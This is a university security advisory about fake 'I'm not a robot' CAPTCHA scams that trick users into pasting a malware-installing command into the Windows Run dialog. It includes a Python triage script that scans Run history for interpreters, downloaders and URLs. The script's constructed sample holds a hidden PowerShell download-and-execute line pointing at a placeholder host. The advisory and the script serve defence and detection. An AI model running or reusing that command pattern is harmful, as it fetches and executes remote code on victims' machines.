Fake CAPTCHA scams target universities
A new scam is making the rounds that imitates a widely recognised online verification measure. Cybercriminals are exploiting trust in the “I’m not a robot” CAPTCHA process to trick users into downloading malware. Instead of confirming that you are human, these fake CAPTCHAs ask you to complete a series of steps that silently install malicious software on your computer.
With an estimated 200 million CAPTCHAs completed every day, they are a prime target for abuse. We are concerned that this attack has already affected other universities.
What is CAPTCHA?
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. A CAPTCHA presents website users with a challenge that is simple for a human but difficult for an automated system or bot. Cybercriminals use malicious bots to automate phishing and Distributed Denial of Service attacks, as described in our previous guidance about mail bombing attacks, so CAPTCHAs give companies an easy way to safeguard their online services.
How the scam works
Fake CAPTCHAs usually appear on untrusted or compromised websites and prompt the user to follow steps that lead to malware installation rather than verification.
When the user clicks “I’m not a robot”, the page does not check whether they are human. Instead, a script on the page silently copies a command to the clipboard, and the user is then told to hold the Windows key and press R to open the Run window, paste the clipboard contents (Ctrl + V) and press Enter. That runs the attacker’s command, which installs malware. One of the most common malware families delivered this way is Lumma Stealer. Once installed, Lumma Stealer can steal browser-stored credentials, cookies, cryptocurrency wallets and system information, without the user realising they have given a cybercriminal access to their device.
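As an added example for CSIRT and IT staff (not part of the original advisory), the Python below shows the trace this trick leaves behind and how to triage it. Windows keeps the history of the Run (Win+R) dialog in the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a command pasted into Run is recorded there even after the browser tab is closed. The script puts those entries in most-recent-first order and flags any that start a command interpreter or downloader, or that contain a URL. The indicator list, the sample registry values and the example URL are constructed assumptions for illustration, not data from a real incident.

```python
"""Triage the Run dialog history that a fake-CAPTCHA paste leaves behind.

Windows records what is typed into the Run (Win+R) dialog under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU: one REG_SZ
value per command (named a, b, c, ...) ending in the two characters "\\1",
plus an MRUList value whose letters give the order, most recent first.
"""
import re
import sys

# Assumed indicators (not taken from the advisory): a Run-dialog entry that
# starts a command interpreter or downloader, or that contains a URL, is not
# what a normal user types into Win+R.
INTERPRETERS = {
    "powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
    "rundll32", "regsvr32", "msiexec", "curl", "bitsadmin", "certutil",
}
URL_RE = re.compile(r"https?://|\bwww\.", re.IGNORECASE)


def order_run_mru(values):
    """Return the Run history as plain commands, most recent first."""
    ordered = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        # Strip the "\1" suffix Explorer appends to every RunMRU entry.
        ordered.append(raw[:-2] if raw.endswith("\\1") else raw)
    return ordered


def is_suspicious(command):
    """Flag a command if it starts an interpreter or references a URL."""
    tokens = command.strip().split()
    if not tokens:
        return False
    # First token, with quotes and any directory path removed.
    first = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if first.endswith(".exe"):
        first = first[:-4]
    return first in INTERPRETERS or bool(URL_RE.search(command))


def find_suspicious_run_entries(values):
    """Suspicious Run-dialog commands, most recent first."""
    return [c for c in order_run_mru(values) if is_suspicious(c)]


def read_run_mru():
    """Read the live RunMRU key on Windows; return {} on other platforms."""
    if sys.platform != "win32":
        return {}
    import winreg  # standard library, Windows only
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, data, _kind = winreg.EnumValue(key, index)
                except OSError:  # no more values under the key
                    break
                values[name] = data
                index += 1
    except FileNotFoundError:  # this user has never used Win+R
        pass
    return values


# Constructed sample in the shape winreg returns for RunMRU. The URL is a
# placeholder in the reserved .invalid TLD, not a real malware host.
SAMPLE_RUN_MRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex"\\1',
}

if __name__ == "__main__":
    # Use the live key on a Windows machine, the constructed sample elsewhere.
    values = read_run_mru() or SAMPLE_RUN_MRU
    for command in find_suspicious_run_entries(values):
        print("SUSPICIOUS Run entry:", command)
```

Run it on the affected user's account (the key is per user, so it must be read while that user is logged in or from their loaded hive). An empty result does not clear the machine: RunMRU is small and easily cleared, so treat a hit as confirmation and a miss as inconclusive.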
As HP noted in a recent press release, the rise in fake CAPTCHAs has led to an increase in:
- information-stealing malware, which takes login credentials and other personal data
- spyware, which records your activity
- ransomware, which locks you out of your files or device and demands payment
How to spot a fake one
Common characteristics of a malicious CAPTCHA include requests to:
- use keyboard shortcuts to run commands (Windows key + R) or to copy and paste (Ctrl + C, Ctrl + V)
- enter credentials
- download files
A genuine CAPTCHA only ever asks you to act inside the web page (tick a box, pick images or type distorted text); it never needs you to open anything else on your computer.
What should I do if I suspect one is fake?
If you believe you have fallen victim to this scam:
- Exit the website immediately: close the browser tab or window showing the suspicious site.
- Run a malware scan with WithSecure. It is pre-installed on University-supplied laptops and available for students and staff to download from Apps Anywhere for personal devices.
- If you pasted and ran the command, assume any passwords saved in your browser have been stolen: change them from a different, clean device.
- Reach out to St Andrews CSIRT (Computer Security Incident Response Team) by emailing [email protected] so they can monitor and address the issue.